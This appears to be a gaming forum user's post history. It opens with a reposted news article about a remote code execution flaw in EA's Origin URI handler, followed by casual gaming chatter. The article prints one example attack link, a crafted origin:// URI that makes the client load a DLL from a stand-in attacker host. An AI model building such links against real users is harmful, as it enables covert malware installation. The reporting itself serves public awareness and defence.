Kell_the_Gamer's forum posts

Avatar image for Kell_the_Gamer
Kell_the_Gamer

885

Forum Posts

0

Wiki Points

2

Followers

Reviews: 0

User Lists: 0

#1 Kell_the_Gamer
Member since 2012 • 885 Posts

Full article here

 

More than 40 million people could be affected by a vulnerability researchers uncovered in EA's Origin online game platform allowing attackers to remotely execute malicious code on players' computers.

The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start games on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper accompanying last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.

Update: "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure," an EA spokesman wrote in an e-mail to Ars.

The attack is similar to an exploit the same researchers demonstrated in October on Steam, a competing online game platform from Valve, with 50 million users. The earlier attack relied on booby-trapped URLs starting with "Steam://" to trick browsers, games, e-mail clients, and other applications into executing code that could compromise the security of the underlying computer. At the time, the researchers advised vulnerable end users to protect themselves against exploits by disabling the automatic launching of Steam:// URLs.

The Origin attack works much the same. It exploits the functionality that allows sites to start games remotely. By modifying the variables in the underlying URI links, the commands to start a game can be replaced with instructions that cause a computer to install a malicious program instead. One such command, which was included in the demo, is related to the OpenAutomate standard used in software provided with graphics cards from Nvidia. The technique works against people who have installed Crysis 3 and a variety of other games. Other techniques work against machines with different titles installed.

When an origin:// link is opened for the first time, browsers will typically ask if a user wants it to open in the Origin client, which is the registered application for such URLs. Different browsers handle these links differently, with some displaying full paths, others showing only parts of them, and still others not displaying the URL at all. Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future. Many gamers choose this setting so they aren't prompted in the future. Those users who have selected this setting may not be required to take any interaction to be attacked. Users who want to protect themselves should make sure they are prompted before Origin links are processed.

 

Promoted Comments

SchmadsArs Scholae Palatinaejump to post

This isn't what I would consider an esoteric security vulnerability, so much as a basic issue with URI handlers. It makes whatever application essentially a browser plugin, because once you click the "handle all future links" option (or whatever it is in your browser of choice), you have then opened up a "trusted" path between the internet and the handler in question. Having seen it with Steam, as was mentioned in the article, and also now Origin, I have a feeling that there are plenty more handlers out there with significant issues that are simply more niche than Origin or Steam.

I'm not trying to excuse it or say it doesn't matter, just that one should always be careful when choosing to treat all future links in the same way, regardless of the handler. It's annoying, but if you set it so that you have to approve the link every time, it means you will notice when something does it unexpectedly, and might not click "yes".

Origin also needs to clean up their handling to not allow arbitrary downloads and execution, but I suspect that there will always be some risk, especially if parameters can be passed to the game being executed (which makes every game on Origin/Steam/whatever an indirect risk).

 

-------------------------------------------

This is another reason I prefer old fashioned, independent game clients. Do we really need to the convenience of all games being tied to one program, one log-in, and having the ability to launch from a website?

Avatar image for Kell_the_Gamer
Kell_the_Gamer

885

Forum Posts

0

Wiki Points

2

Followers

Reviews: 0

User Lists: 0

#2 Kell_the_Gamer
Member since 2012 • 885 Posts
Oh wow, I should had proof read my poll options...
Avatar image for Kell_the_Gamer
Kell_the_Gamer

885

Forum Posts

0

Wiki Points

2

Followers

Reviews: 0

User Lists: 0

#3 Kell_the_Gamer
Member since 2012 • 885 Posts

If you play on a console do you care if the PC version has better graphics? If the game re-releases on another platform with exclusive content do you go and get it, does it make the version you have seem feel less enjoyable?

Avatar image for Kell_the_Gamer
Kell_the_Gamer

885

Forum Posts

0

Wiki Points

2

Followers

Reviews: 0

User Lists: 0

#4 Kell_the_Gamer
Member since 2012 • 885 Posts

[QUOTE="Link3301"]

This might actually be healthy for customers and companies, as it will most likely result in more sales and less drm.

MBirdy88



It likely won't. I have my game budget to spend on games I want most, the rest... if I can play them I will play them,

You swine... :|

Avatar image for Kell_the_Gamer
Kell_the_Gamer

885

Forum Posts

0

Wiki Points

2

Followers

Reviews: 0

User Lists: 0

#5 Kell_the_Gamer
Member since 2012 • 885 Posts

I made a post to a thread in System Wars and it seems to be glitched. On the forum it says I have -1 posts unread and it doesn't show up on my recent posting history. I made my post again and not it shows -2 unread messages, doesn't show up in my history, they didn't bump the thread, but if I go into the thread I can see them.

 

Will others be able to see them? What exactly is going on here?

Avatar image for Kell_the_Gamer
Kell_the_Gamer

885

Forum Posts

0

Wiki Points

2

Followers

Reviews: 0

User Lists: 0

#6 Kell_the_Gamer
Member since 2012 • 885 Posts
(Why did my post delete itself?) I got into DOA when I was 13 and I have never once got off from it. I honestly like it for the gameplay... >.>
Avatar image for Kell_the_Gamer
Kell_the_Gamer

885

Forum Posts

0

Wiki Points

2

Followers

Reviews: 0

User Lists: 0

#7 Kell_the_Gamer
Member since 2012 • 885 Posts
[QUOTE="wakefulness"]

[QUOTE="bleehum"]

And where did I say that?

bleehum

 

Fine, you didn't. Than where is the harm in people liking something in media that is mildly sexual if it does not hurt others?

I never said there's any harm in it. I just think it's pathetic people get excited over virtual women.

I never understood it either. I got into DOA when I was and never really thought about getting off on it. I have always played DOA for the gameplay, I like how fast and smooth it feels...
Avatar image for Kell_the_Gamer
Kell_the_Gamer

885

Forum Posts

0

Wiki Points

2

Followers

Reviews: 0

User Lists: 0

#8 Kell_the_Gamer
Member since 2012 • 885 Posts
[QUOTE="Miketheman83"][QUOTE="Kell_the_Gamer"][QUOTE="Miketheman83"]Sony is worse than Apple. Can't believe people still support this company.

WHOA back up there! Sony is pretty bad but Apple is like a competent North Korea... I have never seen people so brainwashed about being screwed over as the Apple cult.

You don't have to repurchase everything you bought on iTunes everytime you get a new iPhone.

Sony only releases a new console every 10-12 years and the hardware is completely different this time around hence why its a problem for them. Apple releases their products every year with slight upgrades while charging a premium for them while their fans are brainwashed to buy the latest version every single year.
Avatar image for Kell_the_Gamer
Kell_the_Gamer

885

Forum Posts

0

Wiki Points

2

Followers

Reviews: 0

User Lists: 0

#9 Kell_the_Gamer
Member since 2012 • 885 Posts
[QUOTE="Miketheman83"]Sony is worse than Apple. Can't believe people still support this company.

WHOA back up there! Sony is pretty bad but Apple is like a competent North Korea... I have never seen people so brainwashed about being screwed over as the Apple cult.
Avatar image for Kell_the_Gamer
Kell_the_Gamer

885

Forum Posts

0

Wiki Points

2

Followers

Reviews: 0

User Lists: 0

#10 Kell_the_Gamer
Member since 2012 • 885 Posts

So DOA5 is actually really good? How is the online play?